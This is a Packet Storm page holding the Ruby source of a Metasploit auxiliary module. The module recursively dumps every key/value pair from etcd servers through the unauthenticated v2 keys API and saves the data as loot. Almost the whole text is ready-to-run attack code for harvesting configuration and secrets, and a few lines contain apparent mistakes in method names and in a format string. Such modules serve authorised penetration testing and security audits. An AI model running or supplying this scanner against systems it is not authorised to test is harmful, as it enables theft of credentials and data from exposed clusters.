This Metasploit module queries the etcd API to recursively retrieve all of the stored key value pairs. Etcd by default does not utilize authentication.
da0dd53b50d563c3f71695c1da8416749c3880fd22812664e9eff0cc429005b2##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Etcd
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Etcd Keys API Information Gathering',
'Description' => %q(
This module queries the etcd API to recursively retrieve all of the stored
key value pairs. Etcd by default does not utilize authentication.
),
'References' => [
['URL', 'https://gcollazo.com/the-security-footgun-in-etcd/']
],
'Author' => [
'Giovanni Collazo <hello@gcollazo.com>', # discovery
'h00die' # msf module
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Mar 16 2018"
)
end
def run_host(_target_host)
path = normalize_uri(target_uri.to_s, 'v2/keys/?recursive=true')
banner = fingerprint_service(target_uri.to_s)
vprint_status("#{peer} - Collecting data through #{path}...")
res = send_request_raw(
'uri' => path,
'method' => 'GET'
)
# parse the json if we got a good request back
if res && res.code == 200
begin
response = res.get_json_document
store_loot('etcd.data', 'text/json', rhost, response, 'etcd.keys', 'etcd keys')
rescue JSON::ParserError => e
print_error("Failed to read JSON: #{e.class} - #{e.message}}")
return
end
print_good("#{peer}\nVersion: #{banner}\nData: #{JSON.pretty_generate(response)}")
elsif res
vprint_errord("Invalid response #{res.code} for etcd open keys response")
return
else
verbose_error("No response for etcd open keys probe")
return
end
end
end
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed